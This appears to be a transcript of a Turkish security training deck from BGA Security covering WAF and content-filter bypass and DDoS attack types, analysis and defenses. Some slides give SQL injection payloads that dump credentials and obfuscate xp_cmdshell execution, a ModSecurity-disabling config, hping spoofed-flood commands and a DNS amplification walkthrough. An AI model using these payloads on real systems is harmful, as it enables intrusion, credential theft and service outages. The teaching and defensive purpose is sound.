  109. 109. @BGASecurity BGA | Real WorldHping ile Özel Paket Üretimi • Mikrosaniye =saniyenin 100.000’de biri • Saniyede 10 paket göndermek için Ø #hping -i u10000 -S -p 22 www.hedefsite.com –a istenilen_ip_adresi • Saniyede 100 adet paket gönderimi Ø #hping -S -p 22 192.168.2.23 -c 1000 -i u100
  110. 110. @BGASecurity BGA | Real WorldWeb Uygulama Güvenlik Duvarı • Web uygulamalarına spesifik güvenlik duvarı • Sadece port/ip değil tüm paket içeriğine(HTTP, HTTPS vs) bakarak işlem yapılır. • WAF arkasında çalıştırılan uygulama sisteme ne kadar iyi tanıtılırsa o oranda başarı sağlanır. • Ağ tabanlı IPS’lerden daha fazla koruma sağlar! • Değişik yerleşim/çalışma modelleri vardır. Ø Inline Ø Reverse Proxy Ø Passive(Active Response)
  111. 111. @BGASecurity BGA | Real WorldWAF Keşif Çalışması • Wafw00f • Xss denemeleri vs
  112. 112. @BGASecurity BGA | Real WorldWAF Atlatma • Genellikle WAF’lar SSL çözümleme yaptığı için SSL üzerinden atlatma işe yaramaz. • WAF’ların çıkışından itibaren çeşitli atlatma teknikleri geliştirilmiştir. • /*!12345 select * from */ • Reverse_exec • http splitting
  113. 113. @BGASecurity BGA | Real WorldWAF Atlatma:SQL Yorumları • /* comment */ yorum satırı olarak algılanır(SQL +WAF+IPS tarafından) • /*!sql-code*/ ve /*!12345sql-code*/ yorum olarak algılanmaz(SQL tarafından)(WAF+IPS’ler tarafından yorum olarak algılanır) • /?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/
  114. 114. @BGASecurity BGA | Real WorldWAF Atlatma:Encoding Inline çalışan WAF/IPS’lerde işe yarar
  115. 115. @BGASecurity BGA | Real WorldWAF Atlatma:Reverse Fonksiyonu • SQL Sunucularda bulunan reverse fonksiyonu kullanılır Ø Reverse(lqs) = sql • var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('“08.911.39.19 gnip" llehsdmc_px') EXEC (@c);-- • REVERSE('“08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80
  116. 116. @BGASecurity BGA | Real WorldWAF Atlatma:ModSecurity(Yerel) • www kullanıcısının yazma izni varsa hackerın ilk yapacağı işlerden biri Modsecurity WAF’ı devre dışı bırakmak olacaktır. • <IfModule mod_security.c> • SecFilterEngine Off • SecFilterScanPOST Off • </IfModule>
  117. 117. @BGASecurity BGA | Real Worldİçerik Filtreleme Sistemlerini Atlatma Teknikleri • Amaç: iş saatleri içerisinde çalışanların zamanını verimli kullanmalarını sağlama Ø %23 iş kaybı • Facebook, myspace, gazete vs gibi yerler en fazla vakit geçirilen siteler • İçerik Filtreleme Yazılımları Ø Websense, Squid, Dansguardian • Bu sistemleri atlatmanın çeşitli yolları var Ø En bilinenleri ;;
  118. 118. @BGASecurity BGA | Real WorldHTTPS Baglantıları Üzerinden Atlatma • Sayfaların https üzerinden gezilmesi Ø Url bazli yasaklama yapanlar geçilir Ø Genellikle firmalarda 80. port proxy üzerinden çıkacak şekilde yapılandırılır(veya transparan proxy çalışır) 443. port doğrudan internete çıkar • SSL üzerinden sadece domain ismi alınabilir(engelleme için), HTTP connect metodu kullanılarak.
  119. 119. @BGASecurity BGA | Real WorldArama Motorlarıyla Atlatma • Google & Yahoo araçlarini kullanarak atlatma teknikleri • yahoo translator, altavista translator, • bing translator araciligiyla • Arama motorlarının ön belleklerini kullanma
  120. 120. @BGASecurity BGA | Real WorldTranslator Aracılığıyla Atlatma
  121. 121. @BGASecurity BGA | Real WorldCgi-Proxy(http/https) ktunnel, vtunnel, yazılımın asıl ismi
  122. 122. @BGASecurity BGA | Real WorldSSH Socks Proxy ssh -D 8080 vpn.lifeoverip.net –p 443
  123. 123. @BGASecurity BGA | Real WorldHerkese Açık Proxyler Proxy listeleri internetten
  124. 124. @BGASecurity BGA | Real WorldUltrasurf
  125. 125. @BGASecurity BGA | Real WorldUltrasurf Engelleme • Firewall Aracılığıyla Engelleme • IPS Aracılığıyla Engelleme • Proxy/Content Filtering ile engelleme
  126. 126. @BGASecurity BGA | Real WorldProxy ile Engelleme
  127. 127. @BGASecurity BGA | Real World @BGASecurity Bölüm IIIDDoS Saldırıları ve Analiz Yöntemleri
  128. 128. @BGASecurity BGA | Real WorldNeden Önemlidir? • DDoS saldırıları günümüz siber savaç haberlerinin en temel bileşenidir. Ø Medyada çıkan siber savaş haberlerinin çoğu DDoS saldırılarını kastetmektedir. • DDoS açısından Türkiye’nin en kritik sistemleri hangileridir? Ø Nic.tr? Ø Turkiye.gov.tr? Ø GSM altyapısı? Ø IMKB?
  129. 129. @BGASecurity BGA | Real WorldDOS • DOS(Denial Of Service) = sistemleri çalışamaz hale getirmek için yapılan saldırı tipi • Sadece internet üzerinden gerçekleştirilmez • Yerel ağlarda DoS • Kablosuz ağlarda DoS • Genellikle bir ya da birkaç farklı kaynaktan gerçekleştirilir • Bazı saldırılar özünde DoS, sonuçlarına göre DDoS’tur • Tek bir sistemden yapılan spoof edilmiş IP kullanılan SYN flood saldırıları gibi • DoS saldırılarını engellemek DDoS saldırılarına göre daha kolaydır
  130. 130. @BGASecurity BGA | Real WorldDDoS • DDOS(Distrubuted Denial of Service ) =Dağıtık Servis Engelleme • Sonuçları DoS saldırı tipine göre daha etkilidir • Binlerce, yüz binlerce köle(zombi) sistem kullanılarak gerçekleştirilir • Genellikle sahte IP adresleri kullanılır • BotNet’ler kullanılır • Saldırgan kendini gizler
  131. 131. @BGASecurity BGA | Real WorldBilinmesi Gerekenler • Gelen DDOS saldırısı sizin sahip olduğunuz bantgenişliğinden fazlaysa yapılabilecek çok şey yok! • DDOS saldırılarının büyük çoğunluğu bantgenişliği taşırma şeklinde gerçekleşmez! • Bazı saldırı tiplerinde karşı tarafın gönderim hızı düşürülebilir Gürcistan DDOS saldırısı 200-800 Mbps arası
  132. 132. @BGASecurity BGA | Real WorldDOS/DDoS Hakkında Yanlış Bilgiler • Bizim Firewall DOS’u engelliyer • Donanım tabanlı firewallar DOS’u engeller • Bizim IPS DOS/DDOS’u engeller • Linux DOS’a karşı Windows’dan daha dayanıklıdır • Biz de DDOS engelleme ürünü var, her tür saldırıyı engeller • Bizde antivirüs programı var, DDoS saldırıları için zombi olmayız • DOS/DDOS Engellenemez • DDoS saldırıları sadece ISP seviyesinde engellenebilir.
  133. 133. @BGASecurity BGA | Real WorldMalware • Kötücül yazılım • Bilişim sistemlerine yüklenerek sistemi kötü amaçlı kullanımını sağlayan yazılım türü • Malware bulaşan sistem zombi haline dönüşerek sahibinin isteklerini yerine getirmek için çalışır • Spam gönderimi, ddos saldırısı, • reklam tıklamaları vs gibi amaçlarla • kullanılırlar.
  134. 134. @BGASecurity BGA | Real WorldExploit • Bir zaafiyeti kötüye kullanarak sisteme izinsiz erişim yetkisi veren program/scriptlerdir • Sistemlerdeki zaafiyetler exploit edilerek zararlı yazılımlar yüklenebilir • Sistemlerdeki zaafiyetler exploit edilerek DoS yapılabilir
  135. 135. @BGASecurity BGA | Real WorldZombi/(ro)BOT • Zombi: Emir kulu Ø Çeşitli açıklıklardan faydalanılarak sistemlerine sızılmış ve arka kapı yerleştirilmiş sistemler Ø Temel sebebi: Windows yamalarının eksikliği • roBOT = Uzaktan yönlendirilebilir sistemler Ø Zombi • Dünyada milyonlarca vardır • Internet üzerinde bazı illegal sitelerde BotNet satış işlemleri gerçekleştirilmektedir.
  136. 136. @BGASecurity BGA | Real WorldDrive By Download • Kullanıcının haberi olmadan • sistemine zararlı yazılım yükleme
  137. 137. @BGASecurity BGA | Real World(ro)BOTNET(works) • Zombi ve roBOTlardan oluşan yıkım orduları! • Uzaktan yönetilebilirler • Çeşitli amaçlarla kullanılırlar • Genellikle yaması geçilmemiş Windows sistemler ve güncel antivirüs kullanmayan son kullanıcı bilgisayarlarından oluşur • Merkezi olarak yönetilirler
  138. 138. @BGASecurity BGA | Real WorldBotNet Kullanım Amaçları • Yeraltı siber ekonomisinin en güçlü kazanç kapısı Ø SPAM amaçlı kullanılır Ø Google reklamlarından para kazanma amaçlı Ø Google Adword’de öne çıkma veya bir firmayı geri düşürme amaçlı kullanılabilir Ø Anket manipülasyonu Ø DDoS yapmak için kullanılabilir Ø Bilgi çalma amaçlı kullanılabilir Ø Yeni malware yayma amaçlı
  139. 139. @BGASecurity BGA | Real WorldTürkiye BotNet Piyasası Asıl piyasaya internet üzerinden ulaşmak pek mümkün değil. Türkiye dünya BotNet piyasasında önemli yere sahiptir.
  140. 140. @BGASecurity BGA | Real WorldBotNet Oluşturma Yöntemleri • Sunucu tabanlı botnet Ø DDoS saldırıları açısından daha fazla değer ifade eder Ø BlackSeo amaçlı kullanılır • İstemci tabanlı botnet Ø Reklam tıklatma, anket , online seçim manipülasyonunda tercih edilir. Ø Bilgi çalma amaçlı tercih edilir. Ø HTTP GET Flood gibi ip spoofing yapılamayacak DDoS saldırılarında tercih edilir.
  141. 141. @BGASecurity BGA | Real WorldTürkiye’den Güncel Örnek • Haziran ayında çok kullanılan blog/portal yazılımının Türkçe sayfası hacklendi • Hackerlar sisteme sızıp bir sonraki blog sürümüne uzaktan yönetim amaçlı kod eklediler • İlgili siteden portal yazılımını indiren herkes aynı anda sistemlerini hackerların yönetimine teslim etmiş oldu Ø Bu hacking olayını engelleyecek herhangi bir güvenlik cihazı yok.
  142. 142. @BGASecurity BGA | Real WorldGüncel Pasif BotNet Örneği(Türkiye)
  143. 143. @BGASecurity BGA | Real WorldBotNet Yönetim Sistemleri • 2007 yılına kadar BotNet sistemlerin yönetimi büyük çoğunlukla IRC üzerinden gerçekleştirilirdi • 2007 itibariyle IRC yerine HTTP, HTTPS, P2P üzerinden yönetilen BotNet’lere sık rastlanılmaktadır • Neden? Ø IRC üzerinden yönetilen BotNet • kolaylıkla farkedilip devre • dışı bırakılabilir. Ø Kurumsal şirketlerde IRC portuna • erişim güvenlik sistemleri tarafından engellenmiştir.
  144. 144. @BGASecurity BGA | Real WorldTürkiye 2010 Yılı Siber Tehdit Sıralaması ve DDoS
  145. 145. @BGASecurity BGA | Real WorldDDoS Çeşitleri DDOS Bandwidth Doldurma Kaynak Tüketimi
  146. 146. @BGASecurity BGA | Real WorldDDOS-I:Bandwidth Şişirme • Önlemenin yolu yoktur Ø Sürahi bardak ilişkisi • ISP seviyesinde engellenebilir... • L7 protokolleri kullanılarak yapılan DDOS’larda saldırı trafiği çeşitli yöntemlerle ~6’da birine düşürülebilir Ø HTTP GET flood 400 Byte Ø IP Engelleme sonrası sadece syn 60 byte
  147. 147. @BGASecurity BGA | Real WorldDDOS-II:Ağ/güvenlik Cihazlarını Yorma • Amaç ağ-güvenlik sistemlerinin kapasitesini zorlama ve kaldıramayacakları kadar yük bindirme • Oturum(Session) bilgisi tutan ağ/güvenlik • Cihazlarının kapasitesi sınırlıdır
  148. 148. @BGASecurity BGA | Real WorldPaket Boyutları • DDoS saldırılarında paket boyutları çok önemlidir • Saldırganın ne kadar paket gönderebileceği, kurbanın ne kadar trafik kaldırabileceği paket boyutlarıyla doğrudan orantılıdır • Genel geçer kural: paket boyutu küçüldükçe güvenlik sistemlerinin performansı düşer! • Ortalama Ø Bir TCP paketi 60 Byte Ø Bir UDP paketi 40 Byte Ø Bir HTTP paketi 400 Byte
  149. 149. @BGASecurity BGA | Real World100-1000 Mb ile Ne Yapılabilir? • Saldırı Tipine göre • SYNFlood olursa • [100 Mb 200.000 pps] • [1Gb 2.000.000 pps] • UDP flood olursa • [100Mb 400.000pps] • [1Gb 4.000.000 pps] • GET Flood olursa • [100Mb 32.000 pps] • [1Gb 320.000 pps] • 100Mb=100x1024Kb=100x1024x1024b=104857600bit • 104857600bit/8=13107200byte/60=218.000 pps TCP SYN paket boyutu
  150. 150. @BGASecurity BGA | Real WorldTCP Flood • TCP Flood: Hedef sisteme çeşitli TCP bayrakları set edilmiş paketler göndermek • TCP Bayrakları Ø FIN, ACK, PUSH, SYN, RST, URG … • Amaç hedef sistemin kapasitesini zorlama Ø Bant genişliği kapasitesi Ø Paket işleme kapasitesi • Sahte ip adreslerinden gerçekleştirilebilir
  151. 151. @BGASecurity BGA | Real WorldTCP Flood Çeşitleri TCP Flood SYN Flood ACK Flood FIN Flood
  152. 152. @BGASecurity BGA | Real WorldEtki Seviyesine Göre TCP Flood Saldırıları • Günümüz işletim sistemleri ve ağ tabanlı güvenlik sistemleri (Firewall/IPS/…) statefull yapıdadır • Stateful yapı: Bağlantı için gelen ilk paket SYN olmalı, gelen ilk paket SYN ise oturum kurulumunu başlat ve bu oturuma ait diğer paketlere de izin ver. • Bir sisteme gönderilecek FIN, ACK, PUSH bayraklı paketler(SYN harici) hedef sistem tarafından kabul edilmeyecektir.
  153. 153. @BGASecurity BGA | Real WorldFIN Flood Saldırıları • Hedef sisteme sahte ip adreslerinden FIN paketleri gönderme • Hedef sistem önünde Firewall/IPS gibi statefull çalışan bir sistem varsa FIN paketlerine karşı cevap dönmeyecektir Ø Veya RST paketi dönecektir (açık port, kapalı port seçimine göre)
  154. 154. @BGASecurity BGA | Real WorldACK Flood Saldırıları • Hedef sisteme sahte ip adreslerinden ACK paketleri gönderme • Hedef sistem önünde Firewall/IPS gibi statefull çalışan bir sistem varsa ACK paketlerine karşı cevap dönmeyecektir Ø Veya RST paketi dönecektir (açık port, kapalı port seçimine göre)
  155. 155. @BGASecurity BGA | Real WorldSyn Flood DDoS Saldırıları • TCP flood saldırılarında en etkili saldırı tipidir • Hedef sistemin kaynaklarını tüketmek amaçlı gerçekleştirilir • Internet dünyasında en sık gerçekleştirilen DDoS saldırı tipi • Gerekli önlemler alınmamışsa 2Mb hat ile 100Mb hatta sahip olan sistemler devre dışı bırakılabilir. • Saldırı yapması kadar korunması da kolaydır. • Genellikle sahte IP adresleri kullanılarak gerçekleştirilir.
  156. 156. @BGASecurity BGA | Real WorldSyn Flood Sorunu Kaynağı • Problem: Ø SYN paketini alan sistemin SYN-ACK paketi gönderdikten sonra paketi gönderenin gerçek olup olmadığını onaylamadan sistemden kaynak ayırması. • Çözüm: Ø Paketi gönderen IP adresinin gerçek olduğu belirlenmeden sistemden kaynak ayırılmamalı!
  157. 157. @BGASecurity BGA | Real WorldSYN • TCP’e ait bir özelliktir Ø 8 TCP bayrağından biri • TCP oturumlarını başlatmak için kullanılan TCP bayrağı • Sadece oturumun başlangıç aşamasında görülür • SYN paketleri veri taşıyamaz Ø İstisna durumlar anormallik olarak adlandırılır Ø Hping –p 8 0-S localhost –d 100 –E data komutuyla SYN bayraklı TCP paketine veri taşıttırılabilir.
  158. 158. @BGASecurity BGA | Real WorldTCP SYN Paketi Ortalama 60 byte Gönderilen her SYN paketi için hedef sistem ACK-SYN paketi üretecektir.
  159. 159. @BGASecurity BGA | Real WorldSynFlood • Hedef sisteme kapasitesinin üzerinde SYN paketi göndererek yeni paket alamamasını sağlamaktır • En sık yapılan DDoS saldırı tipidir • İlk olarak 1994 yılında “Firewalls and Internet Security “ kitabında teorik olarak bahsi geçmiştir • İlk Synflood DDoS saldırısı 1996 yılında gerçekleştirilmiştir • 2011 yılında henüz bu saldırıya %100 engel olacak standart bir çözüm geliştirilememiştir.
  160. 160. @BGASecurity BGA | Real WorldSyn Flood:Gerçek IP Adresleri Kullanarak • Gerçek ip adresinden gerçekleştirilecek syn flood saldırıları: Ø Tek bir ip adresinden vRahatlıkla engellenebilir Ø Botnet’e dahil tüm ip adreslerinden
  161. 161. @BGASecurity BGA | Real WorldGerçek IP Syn Flood Analizi • Gerçek ip adresleri kullanılarak gerçekleştirilecek SYN flood saldırısının etki seviyesi düşük olacaktır. • Neden? Ø Gönderilen her gerçek SYN paketi sonrası gelecek SYN/ACK cevabına işletim sistemi kızarak(kendisi göndermedi, özel bir araç kullanılarak gönderildi SYN paketi) RST paketi dönecektir. Ø Syn flood yapılan sistemde RST paketi alındığında oturum tablosundan ilgili ip adresine ait bağlantılar silinecektir.
  162. 162. @BGASecurity BGA | Real WorldSyn Flood:Sahte IP Adresleri Kullanarak • Kaynak IP adresi seçilen makine açıksa gelen SYN+ACK paketine RST cevabı dönecektir • Ciddi saldırılarda kaynak ip adresleri canlı olmayan sistemler seçilmeli!
  163. 163. @BGASecurity BGA | Real WorldSahte IP İle SynFlood Analizi • Kaynak ip adresi 5.5.5.5 yapılarak gönderilen SYN paketi için işletim sistemi belirli bir süre SYN/ACK paketi göndererek karşı taraftan ACK paketi bekleyecektir. • Saldırgan: Ø Hping –p 80 –S hedef_ip –c 1 –a 5.5.5.5 • Masum: Ø Netstat –ant|grep 5.5.5.5
  164. 164. @BGASecurity BGA | Real WorldRandom Sahte IP Adresi Kullanarak Syn Flood
  165. 165. @BGASecurity BGA | Real WorldSynFlood Saldırılarını Engelleme • Syn Flood Saldırısı gerçekleştirme çok kolaydır • Syn flood saldırılarını engellemek kolaydır • Syn flood saldırıları için tüm dünya iki temel çözümü kullanır Ø Syn cookie Ø Syn proxy • Bu iki çözüm haricinde endüstri standartı haline gelmiş başka çözüm bulunmamaktadır Ø Farklı adlandırmalar kullanılabilir(syn authentication gibi)
  166. 166. @BGASecurity BGA | Real WorldUDP Flood Saldırıları • UDP stateless bir protokol, yönetimi zor! • Paket boyutları küçük, etkisi yüksek • Amaç UDP servislerini çökertmekten çok aradaki güvenlik cihazlarının kapasitesini zorlayıp cevap veremez hale getirmektir. Ø IPS/Firewall session table • Zaman zaman DNS sunuculara yönelik de yapılır • Syncookie/synproxy gibi kolay bir çözümü yok! Ø Denenmiş, kanıtlanmış standart bir çözüm bulunmamaktadır.
  167. 167. @BGASecurity BGA | Real WorldUDP Flood Saldırıları-II • IP spoofing yapılabilir Ø hping –udp www.lifeoverip.net -p 53 -a www.microsoft.com Ø Paket boyutu ~ 30 byte Ø 20Mb hat ile saniyede 90.000 pps üretilebilir. v 20*1024*1024/8/30 • UDP bağlantısının kapatılması için gerekli ortlama süre 60 saniye • Her gönderilen UDP paketi 60 saniye boyunca Firewall/IPS oturum kapasitesinde yer kaplayacaktır.
  168. 168. @BGASecurity BGA | Real WorldHping İle UDP Flood Saldırısı Gerçekleştirme
  169. 169. @BGASecurity BGA | Real WorldDNS Servisine yönelik DDOS Saldırıları • DNS UDP üzerinden çalışır= kandırılmaya müsait servis • DNS = Internet’in en zayıf halkası Ø E-posta hizmetleri Ø Web sayfalarının çalışması Ø İnternetim çalışmıyor şikayetinin baş kaynağı J • DNS sunuculara yönelik DDOS saldırıları Ø DNS yazılımında çıkan buglar Ø ENDS kullanımı ile amplification saldırıları Ø DNS sunucuların kapasitelerini zorlama
  170. 170. @BGASecurity BGA | Real WorldDnsFlood Saldırıları • DNS sunucuya spoof edilmiş random ip adreslerinden yüzbinlerde sahte(gerçekte olmayan) domain isimleri için istek gönderme • Her gelen istek için DNS sunucunun root dnslere gidip yorulması ve gerçek isteklere cevap verememesi sağlanmaya çalışılır Ø DNS sunucunun kapasitesini zorlama
  171. 171. @BGASecurity BGA | Real WorldDNS Amplification Saldırısı • UDP üzerinden taşınan dns paketleri 512 byten büyük olamaz • EDNS(RFC 2671) dns sorgularının cevapları 512 bytedan daha büyük olabilir • 60 byte(dns isteği) gönderip cevap olarak 4000 byte alınabilir(cevap=56X istek) • 10Mb bağlantıdan 10X65=650 Mbit trafik üretilebilir. • Koruma: recursive dns sorguları ve edns desteği iyi ayarlanmalı
  172. 172. @BGASecurity BGA | Real WorldDNS Amplification DoS Saldırısı
  173. 173. @BGASecurity BGA | Real WorldAdım Adım DNS Amplification DoS 1. Adım Saldırgan rekursif sorguya açık DNS sunucu bulur ve daha önce hazırladığı özel alan adını sorgulatır (Gerçek hayatta özel bir alan adı değil “.” sorgulanır.). Bu isteğin boyutu 50 Byte tutmaktadır. 2. Ara DNS sunucu kendi ön belleğinde olmayan bu isteği gidip ana DNS sunucuya sorar (50 Byte) 3. Adım: Ana DNS sunucu test.bga.com.tr için gerekli cevabı döner (500~byte) 4. Adım: Ara DNS sunucu cevabo ön belleğine alarak bir kopyasını Saldırgana döner. Burada amaç ARA DNS sunucunun dönen 500 Byte’lık cevabı ön belleğe almasını sağlamaktır.
  174. 174. @BGASecurity BGA | Real WorldAdım Adım DNS Amplification DoS-II 5. Adım: Test kullanıcısı (saldırganın kontrolünde) test.bga.com.tr alan adını sorgular ve cevabın cachede olup olmadığını anlamaya çalışır. 6. Adım: Ara DNS sunucu ön belleğinden 500 byte cevap döner 7. Adım:Saldırgan Kurban’ın IP adresinden geliyormuş gibi sahte DNS paketleri gönderir. DNS paketleri test.bga.com.tr’i sorgulamaktadır (ortalama 100.000 dns q/s). Bu üretilen paketlerin Saldırgana maliyeti 100.000 X53 Byte 8. Adım: Ara DNS sunucu gelen her paket için 500 Byte’lık cevabı Kurban sistemlere dönmeye çalışacaktır. Böylece Ara DNS sunucu 100.000X500 Byte trafik üreterek saldırganın kendi trafiğinin 10 katı kadar çoğaltarak Kurban’a saldırıyor gözükecektir.
  175. 175. @BGASecurity BGA | Real WorldDDoS Engelleme DDoS Engelleme Ürünleri Tek İşi DDoS Olan Ürünler Firewall ÜrünleriIPS Ürünleri
  176. 176. @BGASecurity BGA | Real WorldEngelleme Yöntemleri • Genel engelleme yöntemleri • SYN Flood için Syncookie/SynProxy • UDP flood için rate limiting • HTTP Get flood için rate limiting/session limiting • ACK flood için scrubbing • FIN flood için scrubbing • ICMP flood için firewall özellikleri
  177. 177. @BGASecurity BGA | Real WorldGünümüz “Enterprise Security” Ürünleri • Saldırganın silahlarını ve gücünü gördük, buna karşılık güvenlik dünyasının ürettiği savunma sistemlerinin özelliklerine ve güçlerine bakalım • Firewall/IPS sistemleri DDOS saldırılarına nr kadar dayanıklı…. Ø Gelebilecek itirazlar: Firewall/IPS sistemleri DDOS engelleme amaçlı değildir(!)
  178. 178. @BGASecurity BGA | Real WorldFortinet Firewall Limitleri
  179. 179. @BGASecurity BGA | Real WorldNetscreen Firewall Limitleri
  180. 180. @BGASecurity BGA | Real WorldNetscreen ISG Limitleri
  181. 181. @BGASecurity BGA | Real WorldCheckpoint Power-1 Limitleri
  182. 182. @BGASecurity BGA | Real WorldTippingPoint 10Gb IPS Limitleri
  183. 183. @BGASecurity BGA | Real WorldGüvenlik Duvarları ve DDoS Saldırıları • Güvenlik duvarları DDoS saldırıları engelleme amaçlı düşünülmemiştir Ø İstisnalar mevcuttur, Packet Filter gibi • Genellikle izin ver, engelle, session tut gibi özelliklere sahiptir Ø Bazı firewallar syn cookie, syn proxy, rate limiting özelliklerine sahiptir • Session tabloları sınırlıdır Ø Max değer 10.000.000 • Donanım tabanlı olmayanlar ciddi saldırılar karşısında işe yaramaz
  184. 184. @BGASecurity BGA | Real WorldLinux Iptables • Linux işletim sistemi syncookie özelliğine sahiptir Ø Fakat bu özellik sadece işletim sisteminin kendini korumak içindir Ø Linux iptables tarafından korunan sistemlere doğru syncookie özelliği yoktur • Rate limiting özelliği vardır fakat tasarım hatasına sahiptir! • Ciddi saldırılar karşısında yetersizdir! iptables -I INPUT -p tcp --dport 25 -i eth0 -m state --state NEW -m recent --update -- seconds 60 --hitcount 4 -j DROP
  185. 185. @BGASecurity BGA | Real WorldIptables ile Syn Saldırılarını Engelleme • iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH • iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 -- hitcount 8 --rttl --name SSH -j DROP
  186. 186. @BGASecurity BGA | Real WorldIptables ile RateLimiting Iptables limit özelliğinin test edilmesi
  187. 187. @BGASecurity BGA | Real WorldDDoS Engelleme Sistemleri Nasıl Atlatılır? • Temel yöntemler Ø TCP için: SYN cookie, SYN Proxy, Rate limiting, davranışsal analiz, DFAS Ø UDP için: rate limiting, protokol başlık bilgilerinin kontrolü
  188. 188. @BGASecurity BGA | Real WorldDDOS Saldırı Analizi • DDoS saldırılarında dikkate alınması gereken iki temel husus vardır. Ø İlki saldırıyı engelleme Ø ikincisi saldırının kim tarafından ne şiddetde ve hangi yöntemler, araçlar kullanılarak yapıldığınının belirlenmesidir. • Analiz kısmı genellikle unutulur fakat en az engelleme kadar önemlidir Ø Aynı saldırı tekrar ederse nasıl engelleme yapılacağı konusunda yol haritası çıkarılmış olmalı
  189. 189. @BGASecurity BGA | Real WorldDDoS Analizi İçin Gerekli Yapının Kurulması • Amaç DDoS saldırılarında otomatik olarak devreye girip saldırıya ait delil olabilecek paketlerin kaydı • Saldırı anında paketler kaydedilirse saldırıya ait tüm detaylar istenildiği zaman öğrenilebilir • Paket kaydı hedef sistem üzerinde (Windows/Linux) veya ağ ortamında TAP/SPAN portu aracılığıyla yapılabilir • Paket kaydında tcpdump, Wireshark kullanılabilir
  190. 190. @BGASecurity BGA | Real WorldDDoS Analizi İçin Gerekli Yapının Kurulması
  191. 191. @BGASecurity BGA | Real WorldSaldırı Analizinde Cevabı Aranan Sorular • Gerçekten bir DDoS saldırısı var mı? • Varsa nasıl anlaşılır? • DDoS saldırısının tipi nedir? • DDoS saldırısının şiddeti nedir? • Saldırı ne kadar sürmüş? • DDoS saldırısında gerçek IP adresleri mi spoofed IP adresler mi kullanılmış? • DDoS saldırısı hangi ülke/ülkelerden geliyor?
  192. 192. @BGASecurity BGA | Real WorldDDoS Saldırılarında Delil Toplama • DDoS saldırılarında sonradan incelenmek üzere paketler kaydedilmelidir. • Kydedilen trafik miktarına bağlı olarak ciddi sistemlere(CPU, RAM, Disk alanı bakımından) ihtiyaç olabilir. • Paket kaydetme işlemi kesinlikle aktif cihazlar tarafından (IPS, DDoS engelleme Sistemi, Firewall) yapılmamalıdır. • Tüm paket detayları kaydedilmelidir! Ø Tcpdump –s0
  193. 193. @BGASecurity BGA | Real WorldPaket Kaydetme • Paket kaydetme için Linux/FreeBSD üzerinde tcpdump en uygun seçenektir. • Windows üzerinde Wireshark ya da windump tercih edilebilir • 10 Gb ortamlarda klasik libpcap yerine alternatif kütüphaneler tercih edilmelidir. Ø FreeBSD Ringmap Ø Linux PF_RING
  194. 194. @BGASecurity BGA | Real WorldTcpdump ile DDoS Paketlerini Kaydetme #tcpdump –n -w ddostest1.pcap –C 2000 –s0 Ø -n isim-ip çözümlemesi yapma Ø -w ddostest1.pcap dosyasına kaydet Ø Dosya boyutu 2GB olduktan sonra başka dosyaya yaz Ø -s0 pakete ait başlık ve payload bilgilerini kaydet
  195. 195. @BGASecurity BGA | Real WorldAnaliz • Saldırı tipini belirleme Ø Tcpdstat • Saldırı şiddetini belirleme Ø Tcpstat • Saldırı detaylarını ve kaynağını belirleme Ø Tcpdump, tshark
  196. 196. @BGASecurity BGA | Real WorldSaldırı Kaynağını Belirleme • DDoS saldırılarında en önemli sorunlardan biri saldırıyı gerçekleştiren asıl kaynağın bulunamamasıdır. • Bunun temel sebepleri saldırıyı gerçekleştirenlerin zombie sistemler kullanarak kendilerini saklamaları ve bazı saldırı tiplerinde gerçek IP adresleri yerine spoof edilmiş IP adreslerinin kullanılmasıdır. • Saldırı analizinde saldırıda kullanılan IP adreslerinin gerçek IP’ler mi yoksa spoofed IPler mi olduğu rahatlıkla anlaşılabilir.
  197. 197. @BGASecurity BGA | Real WorldSpoof IP Belirleme • Saldırının gerçek IP adreslerinden mi Spoof edilmiş IP adreslerinden mi gerçekleştirildiği nasıl belirlenebilir? Ø Internet üzerinde sık kullanılan DDoS araçları incelendiğinde IP spoofing seçeneği aktif kullanılırsa random üretilmiş sahte IP adreslerinden tek bir paket gönderildiği görülecektir. • Fazla sayıda tek bağlantı gözüküyorsa saldırının spoof edilmiş IP adresleri kullanılarak gerçekleştirildiği varsayılabilir.
  198. 198. @BGASecurity BGA | Real WorldSpoof IP Belirleme-II Tek cümleyle özetleyecek olursak: Eğer aynı IPden birden fazla bağlantı yoksa spoofed IP kullanılmış olma ihtimali yüksektir.
  199. 199. @BGASecurity BGA | Real WorldDDoS-BotNet Çalışma Grubu • DDoS&BotNet konusundaki bilinç düzeyini arttırmak ve bu konudaki gelişmeleri paylaşmak amacıyla 2010 yılında kurulmuştur. Ø E-posta listesi ve çalışma grubu olarak faaliyet göstermektedir. • https://www.bgasecurity.com/bga-community/ adresi üzerinden üye olabilirsiniz. Ø Sadece kurumsal katılıma açıktır.
  200. 200. @BGASecurity BGA | Real World @BGASecurity -Teşekkürler- bgasecurity.com | @bgasecurity

×